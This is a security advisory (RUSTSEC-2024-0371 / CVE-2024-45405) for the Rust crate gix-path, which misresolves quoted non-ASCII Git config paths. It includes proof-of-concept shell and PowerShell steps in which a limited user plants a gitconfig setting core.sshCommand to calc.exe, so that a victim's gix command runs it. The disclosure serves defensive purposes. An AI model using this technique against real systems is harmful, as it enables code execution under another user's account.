```toml
[advisory]
id = "RUSTSEC-2024-0371"
package = "gix-path"
date = "2024-09-06"
url = "https://github.com/Byron/gitoxide/security/advisories/GHSA-m8rp-vv92-46c7"
references = ["https://github.com/advisories/GHSA-m8rp-vv92-46c7"]
categories = ["code-execution", "privilege-escalation"]
cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N"
keywords = ["escape-sequences"]
aliases = ["CVE-2024-45405", "GHSA-m8rp-vv92-46c7"]
license = "CC0-1.0"

[affected.functions]
"gix_path::env::installation_config" = ["*"]
"gix_path::env::installation_config_prefix" = ["*"]

[versions]
patched = [">= 0.10.11"]
```

# gix-path improperly resolves configuration path reported by Git

### Summary

`gix-path` runs `git` to find the path of a configuration file associated with the `git` installation, but improperly resolves paths containing unusual or non-ASCII characters, in rare cases enabling a local attacker to inject configuration leading to code execution.

### Details

In `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` to find the path of a file to treat as belonging to the `git` installation.

Affected versions of `gix-path` do not pass `-z`/`--null` to cause `git` to report literal paths ([`650a1b5`](https://github.com/Byron/gitoxide/commit/650a1b5cf25e086197cc55a68525a411e1c28031)). Instead, to cover the occasional case that `git` outputs a quoted path, they attempt to parse the path by stripping the quotation marks:

<https://github.com/Byron/gitoxide/blob/1cfe577d461293879e91538dbc4bbfe01722e1e8/gix-path/src/env/git/mod.rs#L138-L142>

The problem is that, when a path is quoted, it may change in substantial ways beyond the concatenation of quotation marks. If not reversed, these changes can result in another valid path that is not equivalent to the original.

This is not limited to paths with unusual characters such as quotation marks or newlines. Unless `git` is explicitly configured with `core.quotePath` set to `false`, it also happens when the path contains most non-ASCII characters, including accented or non-English letters. For example, `é` is transformed to `\303\251`, with literal backslashes. (This is an octal representation of the bytes in its UTF-8 encoding. This behavior is not limited to systems that encode paths with UTF-8 on disk.)

Rarely, the configuration file `gix-path` wrongly attempts to open can be created by an attacker who has a limited user account on the system. The attacker would often need to request an account username tailored to carrying out the attack.

### PoC

#### Quick demonstration on Unix

On a Unix-like system in which Git supports no higher scope than `system` for configuration variables (i.e., not on macOS with Apple Git), in a locale that supports UTF-8, with `gitoxide` installed, run:

```sh
mkdir myrepo
cd myrepo
git init
printf '[real]\n\trealvar = realval\n' > 'é'
printf '[fake]\n\tfakevar = fakeval\n' > '\303\251'
GIT_CONFIG_SYSTEM='é' gix config
```

If the above conditions are satisfied and the `gix` command was built against an affected version of `gix-path`, then the last command's output looks something like this:

```text
# From '\303\251' (GitInstallation)
[fake]
        fakevar = fakeval

# From 'é' (System)
[real]
        realvar = realval

# From '/home/ubuntu/.gitconfig' (User)
[init]
        defaultBranch = main

# From './.git/config' (Local)
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
```

#### Demonstration across user accounts on Windows

On a test system running Windows on which Git for Windows is *not* installed system-wide—resembling a scenario in which users who wish to use Git are expected to install it themselves for their accounts—create two accounts, with these usernames:

- *Renée*, the target of the attack. This user may be a limited user or an administrator. Its user profile directory is assumed to be `C:\Users\Renée`.
- *Ren*, the user who carries out the attack. This user should be a limited user, since an administrator would not need to exploit this vulnerability to inject configuration. Its user profile directory is assumed to be `C:\Users\Ren`.

As *Ren*, run these commands in PowerShell:

```powershell
$d = "$HOME\303\251e\AppData\Local\Programs\Git\etc"
mkdir $d
git config --file $d\gitconfig core.sshCommand calc.exe
icacls $HOME\303 /grant 'Renée:(RX)' /T
```

(The `gitconfig` file can instead be written manually, in which case *Ren* need not have `git`.)

As *Renée*:

1. Install Git for Windows in the default location for non-systemwide installations, which for that user account is inside `C:\Users\Renée\AppData\Local\Programs`. For a non-administrative installation, Git for Windows will pick this location automatically. Allow the installer to place the directory containing `git` in the user's `PATH`, as it does by default.

   (The scenario can be modified for any location the attacker can predict. So, for example, *Renée* can install Git for Windows with [`scoop`](https://scoop.sh/), and *Ren* could carry out the attack with correspondingly modified path components in place of `AppData\Local\Programs\Git`.)

2. Install `gitoxide` using any common technique, such as by [installing Rust](https://www.rust-lang.org/tools/install) and then running `cargo install gitoxide`.

3. Open a PowerShell window and run a `gix` command that attempts to run the SSH client for transport. For example:

   ```pwsh
   gix clone ssh://localhost/myrepo.git
   ```

   At least one, and usually two, instances of the Windows calculator will pop up. This happens because `calc.exe` was configured in the fake configuration file the user *Ren* was able to cause to be used, by placing it at the location `gix-path` wrongly resolved the path of *Renée*'s own configuration file to.

The `gitconfig` file written by the attacker can be adjusted with an arbitrary choice of payload, or to set other configuration variables.

### Impact

On a single-user system, it is not possible to exploit this, unless `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` have been set to unusual values or Git has been installed in an unusual way. Such a scenario is not expected.

Exploitation is unlikely even on a multi-user system, though it is plausible in some uncommon configurations or use cases. It is especially unlikely with Apple Git on macOS, due to its very high scoped configuration in `/Library` or `/Applications` that would be detected instead, as in [CVE-2024-45305](https://github.com/advisories/GHSA-v26r-4c9c-h3j6).

The likelihood of exploitation may be higher on Windows, where attacks such as those shown in the Windows proof-of-concept above can be performed due to the status of `\` as a directory separator, and where there is no restriction on usernames containing accented or non-English letters (though the latter is also permitted on some other systems). Even then, complex user interaction is required. In most cases, a system administrator would have to approve an innocuous-seeming username, and then the targeted user (who could be the same or a different user) would have to use an application that uses `gix-path`.

In general, exploitation is more likely to succeed if at least one of the following applies:

- Users are expected to install `git` themselves, and are likely to do so in predictable locations.
- Locations where `git` is installed, whether due to usernames in their paths or otherwise, contain characters that `git` quotes by default in paths, such as non-English letters and accented letters.
- A custom `system`-scope configuration file is specified with the `GIT_CONFIG_SYSTEM` environment variable, and its path is in an unusual location or has strangely named components.
- A `system`-scope configuration file is absent, empty, or suppressed by means other than `GIT_CONFIG_NOSYSTEM`. Currently, `gix-path` can treat a `global`-scope configuration file as belonging to the installation if no higher scope configuration file is available. This increases the likelihood of exploitation even on a system where `git` is installed system-wide in an ordinary way.

However, exploitation is expected to be very difficult even under any combination of those factors.

Although the effect here is similar to [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2) once exploited, a greater degree of user interaction would usually be required, and the attack complexity here is much higher because the necessary conditions are uncommon and challenging to predict.
